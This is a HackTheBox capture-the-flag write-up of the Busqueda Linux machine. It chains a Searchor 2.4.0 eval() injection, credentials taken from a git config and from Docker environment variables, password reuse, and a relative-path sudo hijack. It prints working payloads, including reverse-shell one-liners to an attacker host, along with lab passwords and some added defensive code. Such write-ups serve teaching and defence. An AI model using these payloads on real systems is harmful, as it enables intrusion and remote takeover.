HTB: Busqueda Writeup

Machine Banner

Machine Information

Attribute      | Details
Name           | Busqueda (Searcher)
OS             | Linux
Difficulty     | Easy
Points         | 20
Release Date   | 2023
Hostname       | searcher.htb
Writeup Author | D3vnomi

Machine Rating

⭐⭐⭐⭐☆ (7.5/10)

Difficulty Assessment:

  • Enumeration: ⭐⭐⭐☆☆
  • Real-world: ⭐⭐⭐⭐☆
  • CVE Usage: ⭐⭐⭐⭐☆
  • CTF-like: ⭐⭐⭐☆☆

Summary

Busqueda is an Easy-difficulty Linux machine featuring the Searchor web application running on Flask. The machine demonstrates a realistic chain: exploitation of a public CVE, credential extraction from a git configuration, password reuse, and privilege escalation through a sudo-allowed script that launches a helper by relative path. The attack chain combines Python code injection through eval(), Docker container enumeration, and working-directory hijacking of a root-run script.

TL;DR: Searchor 2.4.0 RCE → Git credential extraction → Password reuse for SSH as svc → Docker environment variable enumeration → Gitea source review → Relative path privilege escalation → Root shell.


Reconnaissance

Port Scanning

Terminal window
nmap -sC -sV -T4 -p- searcher.htb

Results:

PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 (protocol 2.0)
80/tcp open http Apache httpd 2.4.52 (with Werkzeug 2.1.2 / Python 3.10.6)

Service Enumeration

Hostname: searcher.htb

Web Application Stack:

  • Framework: Flask
  • Application: Searchor 2.4.0
  • Backend Technologies: Python 3.10.6, Werkzeug 2.1.2
  • Additional Services: Gitea, Docker, MySQL

Add to hosts file:

Terminal window
echo "10.10.14.143 searcher.htb" >> /etc/hosts
echo "10.10.14.143 gitea.searcher.htb" >> /etc/hosts

Web Application Discovery: The site is a Searchor-powered search interface; its footer reports "Powered by Flask and Searchor 2.4.0". Searchor 2.4.0 is known to have a critical arbitrary code injection vulnerability in its search command (CVE-2023-43651, fixed in 2.4.2).


Initial Foothold

Searchor 2.4.0 Arbitrary Command Injection

Vulnerability: Searchor 2.4.0 builds a Python expression from the user-supplied query and passes it to eval(). The web application shells out to the searchor CLI with the engine and query taken from the search form, so a query containing a single quote closes the string literal and lets arbitrary Python follow it, including __import__('os').system(...). That is why a "search" turns into command execution as the account running the web application.

Exploitation Steps:

  1. Identify the vulnerability:

    • The search page footer reports Searchor 2.4.0, a version known to be vulnerable
    • The search form POSTs an engine and a query to /search; the query reaches eval() unescaped
  2. Exploit the vulnerability:

    Terminal window
    # Public exploit: https://github.com/nikn0laty/Exploit-for-Searchor-2.4.0-Arbitrary-CMD-Injection
    # Payload structure for the query parameter: close the string literal, smuggle in a
    # call as the next argument, close search(), and comment out the rest of the expression
    # query=',__import__('os').system('COMMAND'))#
    # Confirm execution with a harmless COMMAND first, for example a ping or curl back to the attacker host:
    curl -s -X POST http://searcher.htb/search --data-urlencode "engine=Google" \
      --data-urlencode "query=',__import__('os').system('COMMAND'))#"
  3. Gain initial shell:

    Terminal window
    # On the attacker machine
    nc -lvnp 4444
    # Resend the request with COMMAND set to a reverse shell, e.g.
    # bash -c 'bash -i >& /dev/tcp/<attacker-ip>/4444 0>&1'
    # The connection arrives as the account the web application runs under

Result: Remote Code Execution as user svc
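To show why a single quote in the query is enough, here is an added illustration of the eval() pattern behind CVE-2023-43651. It is not Searchor's code or the target's application; Engine and injected_marker are stand-ins (assumed names) so the smuggled call is visible and harmless instead of running os.system():

```python
# Added illustration of the Searchor 2.4.0 bug class (CVE-2023-43651): the CLI
# interpolates the user's query into Python source text and eval()s it.
# NOT Searchor's code. Engine and injected_marker are stand-ins (assumptions)
# that make the injected call observable without executing a real command.

EXECUTED = []  # records what an injected payload managed to call


class Engine:
    """Stand-in for searchor's Engine enum with a single engine."""

    class Google:
        @staticmethod
        def search(query, copy_url=False, open_web=False):
            return f"https://www.google.com/search?q={query}"


def injected_marker(cmd):
    """Harmless stand-in for __import__('os').system(cmd)."""
    EXECUTED.append(cmd)
    return 0  # os.system() would return the exit status here


def vulnerable_search(engine, query, copy=False, open_web=False):
    """Mirrors the 2.4.0 pattern: the query becomes part of the source text."""
    expr = f"Engine.{engine}.search('{query}', copy_url={copy}, open_web={open_web})"
    # Builtins (and therefore __import__) are always reachable from eval().
    return eval(expr, {"Engine": Engine, "injected_marker": injected_marker})


def hardened_search(engine, query, copy=False, open_web=False):
    """Same behaviour without eval(): the engine is looked up by name and the
    query is passed as data, so quotes inside it can never become code."""
    engine_cls = getattr(Engine, engine, None)
    if engine_cls is None or not hasattr(engine_cls, "search"):
        raise ValueError(f"unknown engine: {engine!r}")
    return engine_cls.search(query, copy_url=copy, open_web=open_web)


# Same shape as the real payload: close the string literal, smuggle a call in
# as the next positional argument, close search(), comment out the remainder.
PAYLOAD = "',injected_marker('id'))#"

if __name__ == "__main__":
    print(vulnerable_search("Google", "flask"))
    vulnerable_search("Google", PAYLOAD)
    print("vulnerable version executed:", EXECUTED)
    print(hardened_search("Google", PAYLOAD))
```

Run stand-alone, the vulnerable function reports that injected_marker('id') was called, while the hardened one returns a search URL containing the payload as literal text. The real exploit substitutes __import__('os').system for injected_marker; nothing else about the payload changes.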


User Compromise

Credential Discovery - Git Config Extraction

After gaining RCE as the svc user, enumerate the web application directory:

Terminal window
ls -la /home/svc/
cd /var/www/Searcher_site/
git remote -v
cat .git/config

Discovered Credentials in Git Remote URL:

The .git/config file contains embedded credentials in the remote URL:

http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git

Extracted Credentials:

  • Username: cody
  • Password: jh1usoih2bkjaspwe92
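An added check (not from the writeup) that finds the same kind of leak in any repository: parse the git config and report every remote URL that carries a username and password. The config text below is constructed to match the one found on the box, plus an SSH-style remote that must not produce a false positive.

```python
# Added helper, not part of the writeup: find credentials embedded in git
# remote URLs. SAMPLE_GIT_CONFIG is a constructed .git/config in git's own
# layout (tab-indented keys under [section "name"] headers).
import configparser
import io
from pathlib import Path
from urllib.parse import urlsplit

SAMPLE_GIT_CONFIG = """\
[core]
\trepositoryformatversion = 0
\tbare = false
[remote "origin"]
\turl = http://cody:jh1usoih2bkjaspwe92@gitea.searcher.htb/cody/Searcher_site.git
\tfetch = +refs/heads/*:refs/remotes/origin/*
[remote "mirror"]
\turl = git@gitea.searcher.htb:cody/Searcher_site.git
[branch "main"]
\tremote = origin
\tmerge = refs/heads/main
"""


def embedded_credentials(config_text):
    """Return [(remote_name, username, password, host)] for each remote URL
    whose userinfo component includes a password."""
    # git config is close enough to INI for configparser; interpolation is
    # disabled so '%' in URLs is left alone, strict=False tolerates duplicates.
    parser = configparser.ConfigParser(strict=False, interpolation=None)
    parser.optionxform = str  # keep key case exactly as git wrote it
    parser.read_file(io.StringIO(config_text))
    leaks = []
    for section in parser.sections():
        if not section.startswith('remote "'):
            continue
        url = parser.get(section, "url", fallback=None)
        if not url:
            continue
        parts = urlsplit(url)
        # scp-style remotes (git@host:path) have no scheme and no userinfo;
        # only URL-style remotes can embed user:password@host
        if parts.scheme and parts.username and parts.password is not None:
            name = section[len('remote "'):-1]
            leaks.append((name, parts.username, parts.password, parts.hostname))
    return leaks


def scan_repo(repo_path):
    """Convenience wrapper: read <repo>/.git/config from disk."""
    config = Path(repo_path) / ".git" / "config"
    return embedded_credentials(config.read_text())


if __name__ == "__main__":
    for remote, user, password, host in embedded_credentials(SAMPLE_GIT_CONFIG):
        print(f"remote {remote}: {user}:{password} @ {host}")
```

Point scan_repo at any checkout (for example /var/www/Searcher_site on the box) to get the same report for a real repository; the git credential helper and SSH keys are the fix, since neither writes a password into the remote URL.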

User Access

cody is a Gitea account, not a local user on the box. The same password is reused by the svc account that runs the web application, so it gives an SSH login as svc:

Terminal window
ssh svc@searcher.htb
# Password: jh1usoih2bkjaspwe92

User Flag

Terminal window
cat ~/user.txt

🚩 User Flag: <REDACTED>


Privilege Escalation

Enumeration

Terminal window
sudo -l

Output:

User svc may run the following commands without password (NOPASSWD):
(root) /usr/bin/python3 /opt/scripts/system-checkup.py *

This lets svc run a root-owned Python script as root with any arguments (the trailing * wildcard). The script in /opt/scripts is not readable as svc, so its behaviour has to be learned from its usage output and, later, from its source in the administrator's scripts repository on Gitea.

Initial Exploitation - Docker Enumeration

Running system-checkup.py without arguments prints its usage: it accepts an action (docker-ps, docker-inspect or full-checkup) plus optional arguments. docker-inspect takes a Go template and a container name and hands them to docker inspect, so it can dump any container's configuration as root.

Terminal window
# Show the supported actions
sudo /usr/bin/python3 /opt/scripts/system-checkup.py
# List running containers
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-ps
# Dump a container's configuration (including environment variables)
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea

Enumeration Results:

  • Running containers: gitea (gitea/gitea:latest) and mysql_db (mysql:8)
  • Gitea published on 127.0.0.1:3000 (web) and 127.0.0.1:222 (SSH); Apache proxies gitea.searcher.htb to it
  • MySQL published on 127.0.0.1:3306

Credential Extraction from Docker

The Config section of docker inspect output includes the container's environment, which is how these images receive their database credentials. Inspect both containers:

Terminal window
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' gitea
sudo /usr/bin/python3 /opt/scripts/system-checkup.py docker-inspect '{{json .Config}}' mysql_db

Extracted Credentials (from the Env arrays):

GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh
MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF
MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh
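An added triage helper (mine, not the target's script) for the JSON that docker-inspect '{{json .Config}}' prints: it pulls out environment variables whose names look like secrets and flags values that repeat across containers, which is exactly the password reuse this box turns on. The two Config documents are constructed to resemble the gitea and mysql_db output; fields other than Image and Env are assumptions.

```python
# Added triage helper, not part of the writeup: parse {{json .Config}} output
# and extract secret-looking environment variables. Both Config documents are
# constructed samples shaped like the gitea and mysql_db containers' output.
import json
import re

SECRET_NAME = re.compile(r"(PASS(WORD|WD)?|SECRET|TOKEN|API_?KEY)", re.IGNORECASE)

GITEA_CONFIG = json.dumps({
    "Image": "gitea/gitea:latest",
    "Env": [
        "USER_UID=115", "USER_GID=121",
        "GITEA__database__DB_TYPE=mysql",
        "GITEA__database__HOST=db:3306",
        "GITEA__database__NAME=gitea",
        "GITEA__database__USER=gitea",
        "GITEA__database__PASSWD=yuiu1hoiu4i5ho1uh",
        "PATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin",
    ],
})

MYSQL_CONFIG = json.dumps({
    "Image": "mysql:8",
    "Env": [
        "MYSQL_ROOT_PASSWORD=jI86kGUuj87guWr3RyF",
        "MYSQL_USER=gitea",
        "MYSQL_PASSWORD=yuiu1hoiu4i5ho1uh",
        "MYSQL_DATABASE=gitea",
        "GOSU_VERSION=1.16",
    ],
})


def secret_env(config_json):
    """Parse one {{json .Config}} document; return {NAME: value} for env
    entries whose NAME matches SECRET_NAME."""
    cfg = json.loads(config_json)
    found = {}
    for entry in cfg.get("Env") or []:
        name, sep, value = entry.partition("=")
        if sep and SECRET_NAME.search(name):
            found[name] = value
    return found


def reused_passwords(*configs):
    """Map each secret value to the env names carrying it across containers.
    A value with more than one name is a candidate for password-reuse attempts
    (here: the Gitea DB password is also the Gitea administrator's password)."""
    by_value = {}
    for cfg in configs:
        for name, value in secret_env(cfg).items():
            by_value.setdefault(value, []).append(name)
    return {v: names for v, names in by_value.items() if len(names) > 1}


if __name__ == "__main__":
    for label, cfg in (("gitea", GITEA_CONFIG), ("mysql_db", MYSQL_CONFIG)):
        print(label, secret_env(cfg))
    print("reused:", reused_passwords(GITEA_CONFIG, MYSQL_CONFIG))
```

On the box, pipe the output of the two docker-inspect commands into secret_env instead of the constructed samples; reused_passwords then points straight at yuiu1hoiu4i5ho1uh as the value worth trying against other logins.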

Gitea Administrator Access

The Gitea database password is reused for the Gitea administrator account. Log in with it to read the administrator's private scripts repository, which holds the source of system-checkup.py (the copy in /opt/scripts cannot be read as svc):

Terminal window
# Access via browser: http://gitea.searcher.htb
# Username: administrator
# Password: yuiu1hoiu4i5ho1uh

Relative Path Privilege Escalation

The source shows that the full-checkup action runs ./full-checkup.sh through subprocess (a relative path, not an absolute one). sudo does not change the working directory, so that path resolves against whatever directory the caller is in when running sudo.

Vulnerability: Because the helper is located by relative path, any directory writable by svc can supply a full-checkup.sh that root will execute.

Terminal window
# Create a malicious full-checkup.sh in a directory we control
cd /tmp
cat > full-checkup.sh << 'EOF'
#!/bin/bash
bash -i >& /dev/tcp/10.10.14.X/4445 0>&1
EOF
chmod +x full-checkup.sh
# Start a listener on the attacker machine first: nc -lvnp 4445
# Execute the vulnerable script from /tmp
sudo /usr/bin/python3 /opt/scripts/system-checkup.py full-checkup

Result: The script executes our full-checkup.sh as root, and a root shell lands on the listener.
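The vulnerable pattern beside a hardened one, as an added side-by-side illustration (not the target's system-checkup.py): the first function locates full-checkup.sh exactly as the target does, by a relative path that resolves against the caller's working directory; the second resolves it next to the privileged script and refuses it unless it is a regular file owned by the effective user (root under sudo) and not writable by anyone else. The helper scripts and directories are constructed in temporary directories, and both variants invoke the helper through /bin/sh so the demo does not depend on the temp filesystem allowing exec.

```python
# Added illustration, not the target's script: relative-path helper lookup
# (as in system-checkup.py) versus resolving and vetting the helper next to
# the privileged script. Scripts and directories are constructed in temp dirs.
import os
import stat
import subprocess
import tempfile
from pathlib import Path


def run_checkup_vulnerable(cwd):
    """Mirrors the target: './full-checkup.sh' resolves against the caller's
    working directory, which sudo preserves. The real script execs the file
    directly; going through /bin/sh resolves the path identically."""
    proc = subprocess.run(["/bin/sh", "./full-checkup.sh"], cwd=cwd,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def run_checkup_hardened(script_dir, cwd):
    """Locate the helper relative to the privileged script's own directory,
    never the cwd, and refuse it unless it is a regular file owned by the
    effective user (root under sudo) and writable by that user only."""
    helper = Path(script_dir).resolve() / "full-checkup.sh"
    st = helper.lstat()  # lstat: a symlink planted in script_dir is refused too
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError(f"{helper}: not a regular file")
    if st.st_uid != os.geteuid():
        raise PermissionError(f"{helper}: not owned by uid {os.geteuid()}")
    if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
        raise PermissionError(f"{helper}: group/world writable")
    proc = subprocess.run(["/bin/sh", str(helper)], cwd=cwd,
                          capture_output=True, text=True)
    return proc.stdout.strip()


def write_script(directory, body, mode=0o700):
    """Drop a one-line full-checkup.sh into directory (constructed fixture)."""
    path = Path(directory) / "full-checkup.sh"
    path.write_text("#!/bin/sh\n" + body + "\n")
    path.chmod(mode)
    return path


def demo():
    """Legitimate helper in a 'script dir', planted helper in the caller's cwd
    (the /tmp of the writeup). Returns what each variant ran and whether the
    hardened variant refuses a helper others can modify."""
    with tempfile.TemporaryDirectory() as script_dir, \
         tempfile.TemporaryDirectory() as attacker_cwd:
        write_script(script_dir, "echo legitimate")
        write_script(attacker_cwd, "echo hijacked")
        vuln = run_checkup_vulnerable(attacker_cwd)
        hard = run_checkup_hardened(script_dir, attacker_cwd)
        # Loosen the legitimate helper's permissions: it must now be refused.
        os.chmod(Path(script_dir) / "full-checkup.sh", 0o777)
        try:
            run_checkup_hardened(script_dir, attacker_cwd)
            refused = False
        except PermissionError:
            refused = True
        return vuln, hard, refused


if __name__ == "__main__":
    vuln, hard, refused = demo()
    print("relative path ran:", vuln)
    print("resolved path ran:", hard)
    print("writable helper refused:", refused)
```

The ownership and mode checks are a guard against the sibling mistake (a root-run helper that svc can edit), not a substitute for the absolute path; the stat-then-exec sequence also leaves a small race, so the directory holding the helper should itself be root-owned and not writable by others.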

Root Flag

Terminal window
cat /root/root.txt

🚩 Root Flag: <REDACTED>


Attack Chain Summary

graph TD
A["Reconnaissance<br/>Nmap scan ports 22, 80"] --> B["Identify Searchor 2.4.0<br/>Flask web application"]
B --> C["Searchor 2.4.0 RCE<br/>Command injection exploit"]
C --> D["Initial shell as svc user"]
D --> E["Git config enumeration<br/>Extract credentials from remote URL"]
E --> F["Credentials: cody:jh1usoih2bkjaspwe92<br/>Password reused by local svc account"]
F --> G["SSH access as svc user<br/>sudo -l enumeration"]
G --> H["system-checkup.py analysis<br/>docker-ps / docker-inspect actions discovered"]
H --> I["Docker container enumeration<br/>Extract Gitea and MySQL credentials from Env"]
I --> J["Gitea login: administrator:yuiu1hoiu4i5ho1uh<br/>Read system-checkup.py source in scripts repo"]
J --> K["Identify relative path ./full-checkup.sh<br/>full-checkup action vulnerability"]
K --> L["Create malicious full-checkup.sh<br/>Place in /tmp directory"]
L --> M["Execute: sudo python3 system-checkup.py full-checkup"]
M --> N["Root shell obtained<br/>Privilege escalation complete"]

Tools Used

Tool                       | Purpose
nmap                       | Port scanning and service enumeration
curl/wget                  | Web application interaction and testing
Searchor 2.4.0 RCE Exploit | Arbitrary command injection in Searchor
nc                         | Reverse shell listener and remote access
ssh                        | Secure shell access to system
git                        | Git configuration extraction and analysis
docker                     | Docker container enumeration (via python script)
python3                    | Privilege escalation script execution
bash                       | Malicious shell script creation for privesc
grep/cat                   | Configuration file and credential extraction

Key Learnings

1. Public CVE Exploitation in Real-World Applications

  • Searchor 2.4.0 RCE demonstrates the critical importance of keeping dependencies updated
  • Publicly available exploits can quickly compromise systems running vulnerable software versions
  • Version enumeration during reconnaissance directly enables exploitation

2. Credential Leakage in Version Control

  • Git configurations and remote URLs often contain embedded credentials (plaintext passwords)
  • Accessing .git/config after gaining code execution provides a credential goldmine
  • VCS repositories should never contain plaintext credentials; use SSH keys or credential managers instead

3. Docker Container Information Disclosure

  • Docker container inspect commands expose sensitive environment variables
  • Database passwords and API keys are often passed as environment variables to containers
  • Insufficient access controls on container inspection tools can leak credentials

4. Insecure Privilege Escalation Scripts

  • Scripts that launch helpers by relative path (e.g. ./script.sh) resolve them against the caller's working directory, which sudo leaves unchanged
  • Running such a script with elevated privileges under user control lets the caller choose which helper root executes
  • Always audit sudo-allowed scripts for relative paths, PATH lookups and other caller-controlled inputs before granting NOPASSWD

5. Defense in Depth

  • This machine demonstrates a multi-stage attack requiring:
    • Initial RCE via a public CVE
    • A shell as svc via password reuse (svc's password was embedded in .git/config)
    • Source disclosure of the privileged script via reused Docker credentials
    • Vertical privilege escalation via script misconfiguration
  • Breaking any single link would have prevented full compromise

6. Enumeration Best Practices

  • Always run sudo -l to identify privileged script execution opportunities
  • Docker containers running services often require investigation for credential extraction
  • Whether a privileged script resolves helper paths relative to the caller's working directory is a critical distinction

Author

D3vnomi


Disclaimer

This writeup is for educational purposes only. All activities described were performed in a controlled, legal environment (HackTheBox platform). Unauthorized access to computer systems is illegal.



Vulnerability Table

CVE ID         | Vulnerability                              | Severity | Status
CVE-2023-43651 | Searchor 2.4.0 Arbitrary Command Injection | Critical | Exploited
N/A            | Git Plaintext Credential Storage           | High     | Exploited
N/A            | Insecure Docker Container Inspection       | High     | Exploited
N/A            | Relative Path Privilege Escalation         | Critical | Exploited

Credentials Reference

Service | Username      | Password            | Purpose
Gitea   | cody          | jh1usoih2bkjaspwe92 | Repository access (password reused by the svc system account)
SSH     | svc           | jh1usoih2bkjaspwe92 | Shell access as svc
Gitea   | administrator | yuiu1hoiu4i5ho1uh   | Web application administration (also the Gitea database password)
MySQL   | root          | jI86kGUuj87guWr3RyF | Database administration

Last Updated: 08 Mar 2026

Tags: #HackTheBox #Linux #Easy #CommandInjection #PrivilegeEscalation #Docker #Git